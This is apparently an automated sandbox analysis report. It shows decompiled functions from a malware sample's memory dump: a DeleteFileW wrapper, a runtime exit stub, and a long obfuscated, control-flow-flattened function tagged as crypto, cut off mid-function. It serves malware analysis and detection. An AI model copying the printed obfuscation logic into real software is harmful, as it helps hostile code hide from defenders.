Uniqueness Score: -1.00%

Function 0022AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0022AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002207A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0022aa3f
0x0022aa40
0x0022aa41
0x0022aa44
0x0022aa47
0x0022aa4b
0x0022aa4c
0x0022aa51
0x0022aa5b
0x0022aa64
0x0022aa68
0x0022aa6f
0x0022aa76
0x0022aa8d
0x0022aa90
0x0022aa9d
0x0022aaa8
0x0022aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0022AAA8

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: bda999c00b52578895d364b87efee0fbb129f381efd7f11970989b5c23b94233
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 92F069B191020CFFDF08DF94DD4A89EBFB4EB44304F108088F805A6250D3B69B649B50

Uniqueness

Uniqueness Score: -1.00%

Function 1000745A, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E1000745A() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t7;

				_push(1);
				_push(0);
				_push(0); // executed
				_t1 = E10007592(_t2, _t3, _t4, _t7); // executed
				return _t1;
			}

0x1000745a
0x1000745c
0x1000745e
0x10007460
0x10007468

APIs

_doexit.LIBCMT ref: 10007460

Part of subcall function 10007592: __lock.LIBCMT ref: 100075A0
Part of subcall function 10007592: DecodePointer.KERNEL32(10010D48,0000001C,10007509,1000E4A0,00000001,00000000,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D), ref: 100075DF
Part of subcall function 10007592: DecodePointer.KERNEL32(?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 100075F0
Part of subcall function 10007592: EncodePointer.KERNEL32(00000000,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007609
Part of subcall function 10007592: DecodePointer.KERNEL32(-00000004,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007619
Part of subcall function 10007592: EncodePointer.KERNEL32(00000000,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 1000761F
Part of subcall function 10007592: DecodePointer.KERNEL32(?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007635
Part of subcall function 10007592: DecodePointer.KERNEL32(?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007640
Part of subcall function 10007592: __initterm.LIBCMT ref: 10007668
Part of subcall function 10007592: __initterm.LIBCMT ref: 10007679

Memory Dump Source

Source File: 00000007.00000002.2104680922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2104676360.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104697302.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2104705101.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Pointer$Decode$Encode__initterm$__lock_doexit
String ID:
API String ID: 3712619029-0
Opcode ID: 95a928402f26c3ad262c23712d694438543e680d10ba6aca6599be447fc1c0b7
Instruction ID: 3ec830fb80d18a678ff5eda6f0b3b9b2a61aba64271b485974690d1bc54d2aa8
Opcode Fuzzy Hash: 95a928402f26c3ad262c23712d694438543e680d10ba6aca6599be447fc1c0b7
Instruction Fuzzy Hash: 5EA00269FD470071F86095502C43F9421017764F42FD44050BB0D2C1C5F4DE62584157

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00219FDC, Relevance: 39.5, Strings: 31, Instructions: 734
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00219FDC(void* __edx) {
				void* __edi;
				signed int _t751;
				void* _t787;
				signed char** _t788;
				signed char** _t790;
				signed char** _t793;
				signed char** _t799;
				short _t803;
				signed int _t804;
				signed int _t805;
				void* _t806;
				signed int _t809;
				signed int _t817;
				signed int _t820;
				signed int _t832;
				signed int _t836;
				signed int _t903;
				intOrPtr* _t917;
				short* _t918;
				short* _t919;
				signed int _t920;
				signed int _t921;
				signed int _t922;
				signed int _t923;
				signed int _t924;
				signed int _t925;
				signed int _t926;
				signed int _t927;
				signed int _t928;
				signed int _t929;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t945;
				signed int _t946;
				signed int _t948;
				void* _t949;
				void* _t950;
				void* _t951;
				void* _t954;
				void* _t955;

				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_t917 =  *((intOrPtr*)(_t949 + 0xc7c));
				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_push(_t917);
				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_push(__edx);
				_push(1);
				E0021602B(1);
				 *((intOrPtr*)(_t949 + 0x17c)) = 0x6a586e;
				_t950 = _t949 + 0x1c;
				 *((intOrPtr*)(_t950 + 0x164)) = 0x4d85c8;
				_t946 = 0;
				 *(_t950 + 0x16c) =  *(_t950 + 0x16c) & 0;
				 *((intOrPtr*)(_t950 + 0x168)) = 0x46238e;
				_t806 = 0x2ca20b85;
				 *(_t950 + 0x9c) = 0xada2;
				 *(_t950 + 0x9c) =  *(_t950 + 0x9c) + 0xd9a3;
				_t920 = 0x73;
				 *(_t950 + 0xa0) =  *(_t950 + 0x9c) / _t920;
				 *(_t950 + 0xa0) =  *(_t950 + 0xa0) ^ 0x0000429d;
				 *(_t950 + 0x98) = 0x829e;
				_t921 = 0x5b;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) / _t921;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) | 0x5cf90483;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) ^ 0x5cf976e6;
				 *(_t950 + 0x7c) = 0xdccb;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) | 0xedfbfbdf;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) ^ 0xedfbcdea;
				 *(_t950 + 0xb4) = 0xef7d;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) + 0xffff7351;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) + 0x45;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) ^ 0x0000234d;
				 *(_t950 + 0xe8) = 0xccb1;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) + 0x3b3d;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) ^ 0x0001006d;
				 *(_t950 + 0x74) = 0xc511;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) >> 4;
				_t922 = 0x69;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) / _t922;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) ^ 0x0000383c;
				 *(_t950 + 0xa4) = 0x943d;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) + 0xad44;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) >> 2;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) ^ 0x00004163;
				 *(_t950 + 0x114) = 0x676a;
				_t923 = 0xb;
				 *(_t950 + 0x130) = 0;
				 *(_t950 + 0x110) =  *(_t950 + 0x114) / _t923;
				 *(_t950 + 0x110) =  *(_t950 + 0x110) ^ 0x00005b51;
				 *(_t950 + 0x4c) = 0x9f6f;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) << 0xe;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) + 0x7984;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) | 0x0af96bf2;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) ^ 0x2ffd6a7e;
				 *(_t950 + 0x44) = 0xfa80;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) << 6;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) * 0x6e;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) << 1;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) ^ 0x35d1b322;
				 *(_t950 + 0xec) = 0x5cda;
				 *(_t950 + 0xec) =  *(_t950 + 0xec) << 5;
				 *(_t950 + 0xec) =  *(_t950 + 0xec) ^ 0x000ba47c;
				 *(_t950 + 0x2c) = 0x6ba5;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) << 1;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) >> 1;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) << 0xe;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) ^ 0x1ae9281a;
				 *(_t950 + 0xb4) = 0xc1db;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) << 0xa;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) << 9;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) ^ 0x0ed84dc8;
				 *(_t950 + 0xf0) = 0xa853;
				 *(_t950 + 0xf0) =  *(_t950 + 0xf0) + 0x8705;
				 *(_t950 + 0xf0) =  *(_t950 + 0xf0) ^ 0x00017aa3;
				 *(_t950 + 0xe8) = 0x787f;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) >> 3;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) ^ 0x00000848;
				 *(_t950 + 0xa8) = 0xf94e;
				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) | 0x6bab1057;
				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) >> 3;
				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) ^ 0x0d7537b0;
				 *(_t950 + 0x118) = 0x6b15;
				 *(_t950 + 0x118) =  *(_t950 + 0x118) + 0xcaa9;
				 *(_t950 + 0x118) =  *(_t950 + 0x118) ^ 0x0001740a;
				 *(_t950 + 0x10c) = 0x9660;
				_t804 = 0x3f;
				_t924 = 0x1c;
				 *(_t950 + 0x10c) =  *(_t950 + 0x10c) * 0xe;
				 *(_t950 + 0x10c) =  *(_t950 + 0x10c) ^ 0x00084bb7;
				 *(_t950 + 0x8c) = 0x9ebc;
				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) >> 8;
				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) << 7;
				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) ^ 0x00000420;
				 *(_t950 + 0x124) = 0x986;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) * 0x7d;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x0004cea0;
				 *(_t950 + 0x84) = 0x3532;
				 *(_t950 + 0x84) =  *(_t950 + 0x84) / _t804;
				 *(_t950 + 0x84) =  *(_t950 + 0x84) | 0x9ebb0f6f;
				 *(_t950 + 0x84) =  *(_t950 + 0x84) ^ 0x9ebb511f;
				 *(_t950 + 0xa4) = 0x41f;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) * 5;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) + 0xc752;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) ^ 0x00008c7a;
				 *(_t950 + 0x108) = 0x3cbe;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) >> 0xb;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) ^ 0x00006997;
				 *(_t950 + 0x68) = 0xe725;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) + 0xffffecd7;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) << 5;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) ^ 0x001a364c;
				 *(_t950 + 0xb8) = 0xbf58;
				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) + 0xf62e;
				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) | 0xa3709140;
				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) ^ 0xa3719bce;
				 *(_t950 + 0x100) = 0xd5da;
				 *(_t950 + 0x100) =  *(_t950 + 0x100) + 0xa0be;
				 *(_t950 + 0x100) =  *(_t950 + 0x100) ^ 0x000119e9;
				 *(_t950 + 0x54) = 0x395a;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) << 0xb;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) ^ 0x65ad419f;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) + 0xffff95a8;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) ^ 0x64673eb6;
				 *(_t950 + 0xd4) = 0x77ed;
				 *(_t950 + 0xd4) =  *(_t950 + 0xd4) / _t924;
				 *(_t950 + 0xd4) =  *(_t950 + 0xd4) ^ 0x00006bf4;
				 *(_t950 + 0x114) = 0x68ca;
				 *(_t950 + 0x114) =  *(_t950 + 0x114) << 5;
				 *(_t950 + 0x114) =  *(_t950 + 0x114) ^ 0x000d4b7f;
				 *(_t950 + 0xdc) = 0x2f2e;
				 *(_t950 + 0xdc) =  *(_t950 + 0xdc) << 7;
				 *(_t950 + 0xdc) =  *(_t950 + 0xdc) ^ 0x0017b89d;
				 *(_t950 + 0x24) = 0x5bdf;
				_t925 = 0xa;
				 *(_t950 + 0x28) =  *(_t950 + 0x24) / _t925;
				_t926 = 0x47;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) * 0x43;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) >> 0xf;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x000071e1;
				 *(_t950 + 0x40) = 0xbbeb;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) + 0xd8ab;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) << 3;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) | 0x75fd3d75;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) ^ 0x75fd8dbb;
				 *(_t950 + 0xb0) = 0x7d23;
				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) >> 6;
				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) | 0xd94c1b0d;
				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) ^ 0xd94c252c;
				 *(_t950 + 0x60) = 0xae03;
				 *(_t950 + 0x60) =  *(_t950 + 0x60) << 6;
				 *(_t950 + 0x60) =  *(_t950 + 0x60) + 0x7f22;
				 *(_t950 + 0x60) =  *(_t950 + 0x60) ^ 0x002b81ed;
				 *(_t950 + 0xe4) = 0xc6a2;
				 *(_t950 + 0xe4) =  *(_t950 + 0xe4) + 0x25fd;
				 *(_t950 + 0xe4) =  *(_t950 + 0xe4) ^ 0x0000ec93;
				 *(_t950 + 0x5c) = 0xaf00;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) / _t926;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) ^ 0x47fef2c1;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) >> 1;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) ^ 0x23ff7799;
				 *(_t950 + 0x24) = 0xf54a;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) | 0x369a6272;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) >> 8;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) ^ 0x5776ac87;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) ^ 0x57402b8a;
				 *(_t950 + 0x124) = 0xcc46;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x6d6df670;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x6d6d578c;
				 *(_t950 + 0x12c) = 0x5a4b;
				 *(_t950 + 0x12c) =  *(_t950 + 0x12c) ^ 0xba0c6f91;
				 *(_t950 + 0x12c) =  *(_t950 + 0x12c) ^ 0xba0c6ca3;
				 *(_t950 + 0x34) = 0x6135;
				_t927 = 0xf;
				 *(_t950 + 0x30) =  *(_t950 + 0x34) / _t927;
				 *(_t950 + 0x30) =  *(_t950 + 0x30) + 0x3b37;
				 *(_t950 + 0x30) =  *(_t950 + 0x30) >> 7;
				 *(_t950 + 0x30) =  *(_t950 + 0x30) ^ 0x0000396d;
				 *(_t950 + 0xfc) = 0x664c;
				 *(_t950 + 0xfc) =  *(_t950 + 0xfc) * 0x2d;
				 *(_t950 + 0xfc) =  *(_t950 + 0xfc) ^ 0x0011c86c;
				 *(_t950 + 0x7c) = 0x54c3;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) >> 0xa;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) << 6;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) ^ 0x00004b81;
				 *(_t950 + 0x28) = 0x1122;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x62eeb120;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) * 0x3c;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) + 0xc705;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x2fee2b8f;
				 *(_t950 + 0x40) = 0x14c1;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) | 0xecde44ed;
				_t928 = 0x27;
				 *(_t950 + 0x44) =  *(_t950 + 0x40) / _t928;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) >> 6;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) ^ 0x00184119;
				 *(_t950 + 0x3c) = 0x8f59;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) << 9;
				_t929 = 7;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) / _t929;
				_t930 = 0x30;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) / _t930;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) ^ 0x00009f8e;
				 *(_t950 + 0x108) = 0x8114;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) + 0xffffe072;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) ^ 0x00007574;
				 *(_t950 + 0x68) = 0x1eec;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) >> 5;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) << 9;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) ^ 0x0001b084;
				 *(_t950 + 0x64) = 0x2753;
				 *(_t950 + 0x64) =  *(_t950 + 0x64) ^ 0x81763235;
				 *(_t950 + 0x64) =  *(_t950 + 0x64) << 3;
				 *(_t950 + 0x64) =  *(_t950 + 0x64) ^ 0x0bb0ddd8;
				 *(_t950 + 0x1c) = 0xf5b7;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) | 0x35534ee5;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) >> 9;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) >> 7;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) ^ 0x00003d7d;
				 *(_t950 + 0x38) = 0x2f43;
				_t931 = 0x4b;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) / _t931;
				_t932 = 0x3a;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) / _t932;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) + 0xffff5ca5;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) ^ 0xffff1d3e;
				 *(_t950 + 0xf8) = 0xec82;
				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) + 0x609d;
				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) ^ 0x00011376;
				 *(_t950 + 0x94) = 0xef51;
				_t933 = 0x32;
				 *(_t950 + 0x94) =  *(_t950 + 0x94) / _t933;
				_t934 = 0x11;
				 *(_t950 + 0x90) =  *(_t950 + 0x94) * 0x31;
				 *(_t950 + 0x90) =  *(_t950 + 0x90) ^ 0x00009894;
				 *(_t950 + 0xc8) = 0xb312;
				 *(_t950 + 0xc8) =  *(_t950 + 0xc8) << 0xd;
				 *(_t950 + 0xc8) =  *(_t950 + 0xc8) ^ 0x16624d53;
				 *(_t950 + 0x98) = 0x3fa5;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) + 0x4ab7;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) + 0xffffdc08;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) ^ 0x000078cc;
				 *(_t950 + 0x50) = 0xcffd;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) / _t934;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) | 0x42e0f56c;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) + 0x6d22;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) ^ 0x42e14cb6;
				 *(_t950 + 0xd8) = 0x2cbc;
				 *(_t950 + 0xd8) =  *(_t950 + 0xd8) ^ 0xb4586e51;
				 *(_t950 + 0xd8) =  *(_t950 + 0xd8) ^ 0xb45852ed;
				 *(_t950 + 0x48) = 0xee7b;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) << 0xd;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) << 9;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) | 0xafcc7f53;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) ^ 0xbfcc5369;
				 *(_t950 + 0xd0) = 0xc42e;
				 *(_t950 + 0xd0) =  *(_t950 + 0xd0) | 0xd678f7f1;
				 *(_t950 + 0xd0) =  *(_t950 + 0xd0) ^ 0xd678b2fb;
				 *(_t950 + 0xcc) = 0xa2cf;
				 *(_t950 + 0xcc) =  *(_t950 + 0xcc) ^ 0x45343d70;
				 *(_t950 + 0xcc) =  *(_t950 + 0xcc) ^ 0x4534d4ad;
				 *(_t950 + 0x11c) = 0xb9db;
				 *(_t950 + 0x11c) =  *(_t950 + 0x11c) + 0xffff1101;
				 *(_t950 + 0x11c) =  *(_t950 + 0x11c) ^ 0xffffae8b;
				 *(_t950 + 0x88) = 0xfaa3;
				 *(_t950 + 0x88) =  *(_t950 + 0x88) << 6;
				 *(_t950 + 0x88) =  *(_t950 + 0x88) + 0xcdb3;
				 *(_t950 + 0x88) =  *(_t950 + 0x88) ^ 0x003f3af5;
				 *(_t950 + 0xc0) = 0xa294;
				_t935 = 0x7e;
				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) / _t935;
				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) ^ 0xb019d3d1;
				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) ^ 0xb019fef7;
				 *(_t950 + 0x80) = 0xa0b2;
				 *(_t950 + 0x80) =  *(_t950 + 0x80) << 1;
				 *(_t950 + 0x80) =  *(_t950 + 0x80) << 3;
				 *(_t950 + 0x80) =  *(_t950 + 0x80) ^ 0x000a45e8;
				 *(_t950 + 0x74) = 0x61f;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) + 0xffff105e;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) << 2;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) ^ 0xfffc558b;
				 *(_t950 + 0x1c) = 0xc0d2;
				 *(_t950 + 0x20) =  *(_t950 + 0x1c) / _t804;
				 *(_t950 + 0x20) =  *(_t950 + 0x20) + 0xffff43f4;
				 *(_t950 + 0x20) =  *(_t950 + 0x20) + 0xffff6466;
				 *(_t950 + 0x20) =  *(_t950 + 0x20) ^ 0xfffed62d;
				 *(_t950 + 0x70) = 0xbc2e;
				 *(_t950 + 0x70) =  *(_t950 + 0x70) >> 0xa;
				_t936 = 0x17;
				 *(_t950 + 0x70) =  *(_t950 + 0x70) / _t936;
				 *(_t950 + 0x70) =  *(_t950 + 0x70) ^ 0x00000c9d;
				 *(_t950 + 0xfc) = 0xf001;
				_t937 = 0x14;
				 *(_t950 + 0xf8) =  *(_t950 + 0xfc) * 0x7c;
				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) ^ 0x0074021d;
				 *(_t950 + 0xc4) = 0x7c98;
				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) << 9;
				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) ^ 0x2380f655;
				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) ^ 0x2379c4d7;
				 *(_t950 + 0xbc) = 0xfd89;
				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) + 0xffff54c6;
				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) / _t937;
				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) ^ 0x00005764;
				_t805 =  *(_t950 + 0x13c);
				 *(_t950 + 0x10) =  *(_t950 + 0x140);
				while(1) {
					L1:
					_t896 =  *(_t950 + 0x14);
					while(1) {
						L2:
						while(1) {
							L3:
							_t954 = _t806 - 0x1dc05553;
							if(_t954 > 0) {
								goto L27;
							}
							L4:
							if(_t954 == 0) {
								_push( *((intOrPtr*)(_t950 + 0x120)));
								E002129E3(_t950 + 0x274, 0x400, E0022889D(0x22c6a0,  *(_t950 + 0x24), __eflags),  *(_t950 + 0x140),  *(_t950 + 0x44),  *(_t950 + 0x10c), _t950 + 0x17c, _t950 + 0x478,  *(_t950 + 0x80),  *(_t950 + 0x28));
								_t950 = _t950 + 0x24;
								E00222025( *(_t950 + 0x48), _t760,  *(_t950 + 0x3c),  *((intOrPtr*)(_t950 + 0x104)));
								_t751 =  *(_t950 + 0x18);
								_t806 = 0x23448a49;
								while(1) {
									L1:
									_t896 =  *(_t950 + 0x14);
									goto L2;
								}
							} else {
								_t955 = _t806 - 0x160634a6;
								if(_t955 > 0) {
									__eflags = _t806 - 0x16d97506;
									if(_t806 == 0x16d97506) {
										E0021F536( *(_t950 + 0x7c),  *(_t950 + 0x24),  *(_t950 + 0x70),  *((intOrPtr*)(_t950 + 0x144)));
										_t806 = 0x36d580c3;
										goto L13;
									} else {
										__eflags = _t806 - 0x1a0940a4;
										if(_t806 == 0x1a0940a4) {
											E0021839D(_t950 + 0x170, _t917);
											_t806 = 0x1dc05553;
											goto L13;
										} else {
											__eflags = _t806 - 0x1a22d724;
											if(_t806 != 0x1a22d724) {
												goto L44;
											} else {
												 *(_t950 + 0x138) =  *(_t950 + 0x138) & 0x00000000;
												 *(_t950 + 0x140) =  *(_t950 + 0x140) & 0x00000000;
												_t832 = _t950 + 0x13c;
												E0021C769(_t832, _t950 + 0x170,  *(_t950 + 0x88),  *(_t950 + 0x80), _t950 + 0x20c,  *(_t950 + 0x30), _t896, _t950 + 0x280, _t950 + 0x474,  *(_t950 + 0x3c),  *(_t950 + 0xf8),  *(_t950 + 0x90));
												_t950 = _t950 + 0x28;
												asm("sbb ecx, ecx");
												_t806 = (_t832 & 0xd5e50b3a) + 0x355eeb92;
												goto L13;
											}
										}
									}
								} else {
									if(_t955 == 0) {
										 *(_t950 + 0x160) = _t751;
										 *((intOrPtr*)(_t950 + 0x15c)) = 1;
										 *(_t950 + 0x160) = _t805;
										E002196CD(_t950 + 0x148,  *((intOrPtr*)(_t950 + 0xac)), _t950 + 0x158,  *(_t950 + 0x118));
										_pop(_t836);
										asm("sbb ecx, ecx");
										_t806 = (_t836 & 0x02a7bfa7) + 0x36d580c3;
										goto L13;
									} else {
										if(_t806 == 0x6ef04) {
											E0021F536( *(_t950 + 0x90),  *(_t950 + 0xc8),  *(_t950 + 0x84),  *(_t950 + 0x13c));
											_t806 = 0x16d97506;
											goto L13;
										} else {
											if(_t806 == 0x9a9cbcb) {
												_push(_t806);
												_push( *((intOrPtr*)(_t917 + 4)));
												_t941 = E002278B7(_t806);
												_t951 = _t950 + 4;
												_t805 = E00218736(_t780);
												__eflags = _t805;
												if(__eflags != 0) {
													_t751 = E00226B8A(_t941,  *((intOrPtr*)(_t951 + 0x58)), __eflags,  *((intOrPtr*)(_t951 + 0xfc)), _t805,  *_t917,  *((intOrPtr*)(_t951 + 0x30)),  *((intOrPtr*)(_t917 + 4)));
													_t950 = _t951 + 0x14;
													 *(_t950 + 0x10) = _t751;
													__eflags = _t751;
													if(__eflags == 0) {
														_push(_t805);
														_push( *(_t950 + 0xec));
														_t903 =  *(_t950 + 0xf8);
														_t817 =  *(_t950 + 0xbc);
														L48:
														E0021F536(_t817, _t903);
													} else {
														_t806 = 0x160634a6;
														while(1) {
															L1:
															_t896 =  *(_t950 + 0x14);
															goto L2;
														}
													}
												}
											} else {
												if(_t806 == 0xb43f6cc) {
													__eflags = E00229B45( *((intOrPtr*)(_t950 + 0xc74)),  *(_t950 + 0xd0),  *(_t950 + 0x9c), _t950 + 0x134);
													_t946 =  !=  ? 1 : _t946;
													_t806 = 0x2a19e3bf;
													 *(_t950 + 0x130) = _t946;
													L13:
